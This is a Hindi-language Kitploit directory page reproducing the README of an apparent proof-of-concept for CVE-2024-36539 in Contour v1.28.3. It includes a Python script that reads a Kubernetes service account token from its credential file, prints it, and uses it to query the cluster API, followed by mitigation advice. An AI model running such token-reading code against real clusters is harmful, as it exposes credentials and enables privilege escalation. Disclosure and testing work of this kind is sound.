Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-36539 — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Contour v1.28.3 में असुरक्षित अनुमतियों को प्रदर्शित करता है, जो सेवा खाता टोकन चोरी और विशेषाधिकार वृद्धि के लिए Kubernetes API पहुंच को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/abdurahmon3236/cve-2024-36539
विशेषाधिकार वृद्धिकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षारेड टीमिंग
GitHubabdurahmon3236/cve-2024-36539

CVE-2024-36539

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Contour v1.28.3 में असुरक्षित अनुमतियों को प्रदर्शित करता है, जो सेवा खाता टोकन चोरी और विशेषाधिकार वृद्धि के लिए Kubernetes API पहुंच को सक्षम करता है।

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

यहाँ एक README.md है जो एक प्रूफ ऑफ कॉन्सेप्ट (PoC) के लिए है, जो Contour v1.28.3 में असुरक्षित अनुमतियों की कमजोरी को प्रदर्शित करता है:


Contour v1.28.3 में असुरक्षित अनुमतियों की कमजोरी के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC)

इस रिपॉजिटरी में एक प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट है जो Contour v1.28.3 में असुरक्षित अनुमतियों की कमजोरी को प्रदर्शित करती है। यह कमजोरी हमलावरों को सेवा खाते का टोकन प्राप्त करके संवेदनशील डेटा तक पहुँचने और विशेषाधिकारों को बढ़ाने की अनुमति देती है।

कमजोरी का विवरण

CVE-ID: (लंबित)

अवलोकन: Contour v1.28.3 में असुरक्षित अनुमतियाँ हैं जो हमलावरों को सेवा खाते का टोकन एक्सेस करने की अनुमति देती हैं। इस कमजोरी का शोषण करके, एक हमलावर सेवा खाते का टोकन प्राप्त कर सकता है, जिसका उपयोग संवेदनशील डेटा तक पहुँचने और संभावित रूप से Kubernetes क्लस्टर के भीतर विशेषाधिकारों को बढ़ाने के लिए किया जा सकता है।

प्रभावित संस्करण:

  • Contour v1.28.3

शमन उपाय:

  • Contour द्वारा उपयोग किए जाने वाले सेवा खातों की अनुमतियों की समीक्षा करें और समायोजित करें।
  • सुनिश्चित करें कि सेवा खातों में न्यूनतम आवश्यक अनुमतियाँ हों।
  • सेवा खाता टोकन का नियमित रूप से ऑडिट करें और घुमाएँ।

PoC विवरण

यह PoC स्क्रिप्ट प्रदर्शित करती है कि Contour v1.28.3 में सेवा खाते के टोकन तक कैसे पहुँचा जाए। सुनिश्चित करें कि आपके पास यह परीक्षण करने की स्पष्ट अनुमति है।

PoC स्क्रिप्ट

root@kitploit:~
import os
import requests

# Configuration
kubernetes_api_url = "https://kubernetes.default.svc"  # Kubernetes API URL
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"  # Path to the service account token
namespace_path = "/var/run/secrets/kubernetes.io/serviceaccount/namespace"  # Path to the namespace

def get_service_account_token():
    try:
        # Read the service account token
        with open(token_path, 'r') as token_file:
            token = token_file.read().strip()
        print(f"[+] Service Account Token: {token}")
        return token
    except Exception as e:
        print(f"[-] Error reading token: {e}")
        return None

def get_namespace():
    try:
        # Read the namespace
        with open(namespace_path, 'r') as namespace_file:
            namespace = namespace_file.read().strip()
        print(f"[+] Namespace: {namespace}")
        return namespace
    except Exception as e:
        print(f"[-] Error reading namespace: {e}")
        return None

def access_kubernetes_api(token, namespace):
    try:
        # Set the headers with the token
        headers = {
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json"
        }
        
        # Make a request to the Kubernetes API to get pods in the namespace
        response = requests.get(f"{kubernetes_api_url}/api/v1/namespaces/{namespace}/pods", headers=headers, verify=False)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.json())
        
        if response.status_code == 200:
            print("[+] Successfully accessed Kubernetes API.")
        else:
            print("[-] Failed to access Kubernetes API.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Get the service account token and namespace
    token = get_service_account_token()
    namespace = get_namespace()
    
    if token and namespace:
        # Access the Kubernetes API using the token
        access_kubernetes_api(token, namespace)

स्पष्टीकरण

  1. कॉन्फ़िगरेशन: स्क्रिप्ट Kubernetes API URL और सेवा खाता टोकन और नेमस्पेस फ़ाइलों के पथ को कॉन्फ़िगर करती है।
  2. सेवा खाता टोकन प्राप्त करें: फ़ाइल सिस्टम से सेवा खाता टोकन पढ़ता है।
  3. नेमस्पेस प्राप्त करें: फ़ाइल सिस्टम से नेमस्पेस पढ़ता है।
  4. Kubernetes API तक पहुँचें: टोकन का उपयोग करके नेमस्पेस में पॉड्स को सूचीबद्ध करने के लिए Kubernetes API को एक अनुरोध भेजता है।

महत्वपूर्ण विचारणीय बातें

  • अनुमतियाँ: सुनिश्चित करें कि आपके पास लक्ष्य प्रणाली पर इस कमजोरी का परीक्षण करने की स्पष्ट अनुमति है। अनधिकृत परीक्षण अवैध और अनैतिक है।
  • परीक्षण वातावरण: उत्पादन प्रणालियों को प्रभावित करने से बचने के लिए नियंत्रित वातावरण में परीक्षण करें।
  • नैतिक उपयोग: इस PoC का उपयोग जिम्मेदारी से और केवल अधिकृत संदर्भों में करें।

शमन

इस कमजोरी को दूर करने के लिए:

  1. सेवा खाते की अनुमतियों की समीक्षा करें: सुनिश्चित करें कि सेवा खातों में न्यूनतम आवश्यक अनुमतियाँ हों।
  2. टोकन का ऑडिट और रोटेशन करें: नियमित रूप से सेवा खातों का ऑडिट करें और टोकन कम्प्रोमाइज़ के जोखिम को कम करने के लिए टोकन को घुमाएँ।
  3. Contour को अपडेट करें: Contour और अन्य Kubernetes घटकों को नवीनतम सुरक्षा पैच के साथ अद्यतित रखें।

अपने Contour डिप्लॉयमेंट को सुरक्षित करने के बारे में अधिक जानकारी के लिए, आधिकारिक Contour दस्तावेज़ीकरण देखें।


यह README.md कमजोरी का एक अवलोकन, समस्या को प्रदर्शित करने के लिए एक PoC स्क्रिप्ट, और जोखिम को कम करने के निर्देश प्रदान करता है। सुनिश्चित करें कि आप इस PoC को जिम्मेदारी से और केवल उन प्रणालियों पर संभालें जहाँ आपके पास स्पष्ट प्राधिकरण है।

टूल डाउनलोड करें